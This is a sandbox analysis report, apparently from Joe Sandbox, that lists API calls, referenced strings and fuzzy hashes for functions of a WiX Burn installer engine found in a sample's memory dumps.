                                                                                                                                                                                                                                                                                                  • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$engine.cpp

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set source process path variable., xrefs: 00877709
                                                                                                                                                                                                                                                                                                  • Failed to initialize variables., xrefs: 00877571
                                                                                                                                                                                                                                                                                                  • Failed to get source process folder from path., xrefs: 00877725
                                                                                                                                                                                                                                                                                                  • Failed to parse command line., xrefs: 00877667
                                                                                                                                                                                                                                                                                                  • WixBundleUILevel, xrefs: 008776D6, 008776E7
                                                                                                                                                                                                                                                                                                  • Failed to overwrite the %ls built-in variable., xrefs: 008776BB
                                                                                                                                                                                                                                                                                                  • Failed to set original source variable., xrefs: 0087776A
                                                                                                                                                                                                                                                                                                  • Failed to get manifest stream from container., xrefs: 008775CC
                                                                                                                                                                                                                                                                                                  • Failed to get unique temporary folder for bootstrapper application., xrefs: 008777CE
                                                                                                                                                                                                                                                                                                  • Failed to open manifest stream., xrefs: 008775AB
                                                                                                                                                                                                                                                                                                  • Failed to set source process folder variable., xrefs: 00877745
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 00877759
                                                                                                                                                                                                                                                                                                  • Failed to load manifest., xrefs: 008775E8
                                                                                                                                                                                                                                                                                                  • Failed to initialize internal cache functionality., xrefs: 0087779F
                                                                                                                                                                                                                                                                                                  • Failed to open attached UX container., xrefs: 0087758E
                                                                                                                                                                                                                                                                                                  • Failed to load catalog files., xrefs: 0087780F
                                                                                                                                                                                                                                                                                                  • WixBundleElevated, xrefs: 008776A5, 008776B6
                                                                                                                                                                                                                                                                                                  • Failed to extract bootstrapper application payloads., xrefs: 008777EF
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessFolder, xrefs: 00877734
                                                                                                                                                                                                                                                                                                  • WixBundleSourceProcessPath, xrefs: 008776F8
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                                                                  • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                                                                                                                                                                  • API String ID: 32694325-1564579409
                                                                                                                                                                                                                                                                                                  • Opcode ID: b3e209ae9fff4d734823f06cec156a79a29746c766e6cd24ac20fd9869ec76c7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 67645990beccaa4a53b5a582fe08f9f4fd7936fda9b0ef4e0862e0e5f6ed36cb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3e209ae9fff4d734823f06cec156a79a29746c766e6cd24ac20fd9869ec76c7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9FA1D972E4461ABBDB129AA4CC85EEEB76CFB00740F058626F519F7245D730E904CBE5

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,00864DBC,?,?,00000000,00864DBC,00000000), ref: 00878713
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00878720
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A3EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 008A3F73
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,008AB4B8,00000000,00000000,00000000,?,00000000,008AB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008787CD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008787D7
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(00000000,?,00000000,008AB500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00878902
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to seek to signature table in exe header., xrefs: 0087886C
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00878744, 008787FB, 00878862, 008788D1
                                                                                                                                                                                                                                                                                                  • cabinet.dll, xrefs: 0087887B
                                                                                                                                                                                                                                                                                                  • Failed to create engine file at path: %ls, xrefs: 00878751
                                                                                                                                                                                                                                                                                                  • Failed to copy engine from: %ls to: %ls, xrefs: 008787A8
                                                                                                                                                                                                                                                                                                  • Failed to update signature offset., xrefs: 00878821
                                                                                                                                                                                                                                                                                                  • msi.dll, xrefs: 00878814
                                                                                                                                                                                                                                                                                                  • Failed to seek to original data in exe burn section header., xrefs: 008788DB
                                                                                                                                                                                                                                                                                                  • Failed to seek to checksum in exe header., xrefs: 00878805
                                                                                                                                                                                                                                                                                                  • Failed to zero out original data offset., xrefs: 008788F4
                                                                                                                                                                                                                                                                                                  • Failed to seek to beginning of engine file: %ls, xrefs: 00878779
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3456208997-1976062716

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(0087756B,008653BD,00000000,00865445), ref: 0086764C
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                                                                                                                                                                                  • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                                                                                                                                                                  • API String ID: 32694325-3635313340

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00865489), ref: 00878310
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0879: OpenProcessToken.ADVAPI32(?,00000008,?,008653BD,00000000,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A0897
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0879: GetLastError.KERNEL32(?,?,?,?,?,?,?,0087769D,00000000), ref: 008A08A1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,0087769D,00000000), ref: 008A092B
                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 00878336
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00878340
                                                                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 008783BD
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008783C7
                                                                                                                                                                                                                                                                                                  • UuidCreate.RPCRT4(?), ref: 00878406
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 00878364, 008783EB, 0087843C
                                                                                                                                                                                                                                                                                                  • %ls%ls\, xrefs: 00878458
                                                                                                                                                                                                                                                                                                  • Temp\, xrefs: 00878395
                                                                                                                                                                                                                                                                                                  • Failed to convert working folder guid into string., xrefs: 00878446
                                                                                                                                                                                                                                                                                                  • Failed to concat Temp directory on windows path for working folder., xrefs: 008783AD
                                                                                                                                                                                                                                                                                                  • Failed to get temp path for working folder., xrefs: 008783F5
                                                                                                                                                                                                                                                                                                  • Failed to copy working folder path., xrefs: 0087848B
                                                                                                                                                                                                                                                                                                  • Failed to create working folder guid., xrefs: 00878413
                                                                                                                                                                                                                                                                                                  • Failed to get windows path for working folder., xrefs: 0087836E
                                                                                                                                                                                                                                                                                                  • Failed to ensure windows path for working folder ended in backslash., xrefs: 0087838B
                                                                                                                                                                                                                                                                                                  • Failed to append bundle id on to temp path for working folder., xrefs: 00878470
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                                                                                                                                                                  • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 266130487-819636856

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0088111D
                                                                                                                                                                                                                                                                                                  • CoUninitialize.COMBASE ref: 00881398
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                                                                  • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3442037557-1168358783
                                                                                                                                                                                                                                                                                                  • Opcode ID: ed382f637110a213adea92a433eaee9d372348684db9f1b5f57f88b69dc636a2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 76b46cbee44fa6b2e0bbb8800b5b5a1c6a39ce836e167eb56bc7e238b48f426d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed382f637110a213adea92a433eaee9d372348684db9f1b5f57f88b69dc636a2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85510736A40265E7DF20B7988C0DAAB365DFB41770B260325BD21FB791DB298C0197D6

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,00865266,?,?,00000000,?,?), ref: 00864303
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(000000D0,?,?,00865266,?,?,00000000,?,?), ref: 0086430C
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,00865266,?,?,00000000,?,?), ref: 00864352
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,00865266,?,?,00000000,?,?), ref: 0086435C
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00865266,?,?,00000000,?,?), ref: 00864370
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,00865266,?,?,00000000,?,?), ref: 00864380
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00865266,?,?,00000000,?,?), ref: 008643D0
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,00865266,?,?,00000000,?,?), ref: 008643DA
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,00865266,?,?,00000000,?,?), ref: 008643EE
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.filehandle.self,?,?,00865266,?,?,00000000,?,?), ref: 008643FE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                                                                                                                                                                  • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3039292287-3209860532
                                                                                                                                                                                                                                                                                                  • Opcode ID: 95895500856b9ccc1dbe3919a70587662e55415a68c79f7129f65c7708f313dd
                                                                                                                                                                                                                                                                                                  • Instruction ID: 09e4f1391cc06d49854472e269baeec598364ceda8e2ac8a2282026f087a6d90
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95895500856b9ccc1dbe3919a70587662e55415a68c79f7129f65c7708f313dd
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8251B171A00215BEDB24DB68CC87F9E7B6CFF05760F110126FA14E7291DB74A950CBA5

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,0086C47F,00865405,?,?,00865445), ref: 0086C2D6
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C2E7
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?), ref: 0086C336
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C33C
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C33F
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C349
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C39B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 0086C3A5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CurrentFileProcess$CreateDuplicateHandlePointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to duplicate handle to container: %ls$Failed to move file pointer to container offset.$Failed to open container.$Failed to open file: %ls$container.cpp$crypt32.dll$feclient.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 2619879409-373955632
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2660a18ca3092100ffb6e9dd8a00552971d4acdc4d88f1efeb1a5fa59a34cd61
                                                                                                                                                                                                                                                                                                  • Instruction ID: b79faa7b8daf445638f553c99cc70d742ca1069f6a9382a350b791d1a3e242e7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2660a18ca3092100ffb6e9dd8a00552971d4acdc4d88f1efeb1a5fa59a34cd61
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32410E36540201ABDB219F698D45F2B7BA5FFC5720F228029FD64EB342EB75C801DBA1

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863838: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00863877
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863838: GetLastError.KERNEL32 ref: 00863881
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A4A6C: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 008A4A9D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDeterminePatchSequenceW,00000000), ref: 008A2B41
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiDetermineApplicablePatchesW), ref: 008A2B61
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiEnumProductsExW), ref: 008A2B81
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetPatchInfoExW), ref: 008A2BA1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiGetProductInfoExW), ref: 008A2BC1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSetExternalUIRecord), ref: 008A2BE1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(MsiSourceListAddSourceExW), ref: 008A2C01
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast$DirectorySystem
                                                                                                                                                                                                                                                                                                  • String ID: Msi.dll$MsiDetermineApplicablePatchesW$MsiDeterminePatchSequenceW$MsiEnumProductsExW$MsiGetPatchInfoExW$MsiGetProductInfoExW$MsiSetExternalUIRecord$MsiSourceListAddSourceExW
                                                                                                                                                                                                                                                                                                  • API String ID: 2510051996-1735120554
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1054e4368066ec6f749a1f194516a2f9808d1de18da0e23eaa81378c46d90d9b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9f659acb47d3b431e272b66a9a9ee5d9b7f356b04f58ef2d7945bc3979ab88a2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1054e4368066ec6f749a1f194516a2f9808d1de18da0e23eaa81378c46d90d9b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 713104B0900A08EBEB119F24ED03F1A7BB4FB35719F00013AE450A6A70F7B68851EF54
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,wininet.dll,?,00000000,00000000,00000000,?,?,0086C3EB,?,00000000,?,0086C47F), ref: 00881778
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0086C3EB,?,00000000,?,0086C47F,00865405,?,?,00865445,00865445,00000000,?,00000000), ref: 00881781
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp$wininet.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 545576003-938279966
                                                                                                                                                                                                                                                                                                  • Opcode ID: eac4b3ba59550ae87c3d7b2f07d1d2cd48c2af71b6e45c514448711d19028f11
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7d64abf84045fcb53e7cb4c2f68cfb1afe8dc99a1680643751bfdb0db5ddeb35
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eac4b3ba59550ae87c3d7b2f07d1d2cd48c2af71b6e45c514448711d19028f11
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE21B877D4163676EA2136A94C4AF67695CFB04BA0B124135FD20FB781EF54DC0187E2
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNELBASE(SystemFunction040,AdvApi32.dll), ref: 0089FCD6
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(SystemFunction041), ref: 0089FCE8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptProtectMemory,Crypt32.dll), ref: 0089FD2B
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0089FD3F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectMemory), ref: 0089FD77
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 0089FD8B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: AdvApi32.dll$Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory$SystemFunction040$SystemFunction041$cryputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 4214558900-3191127217
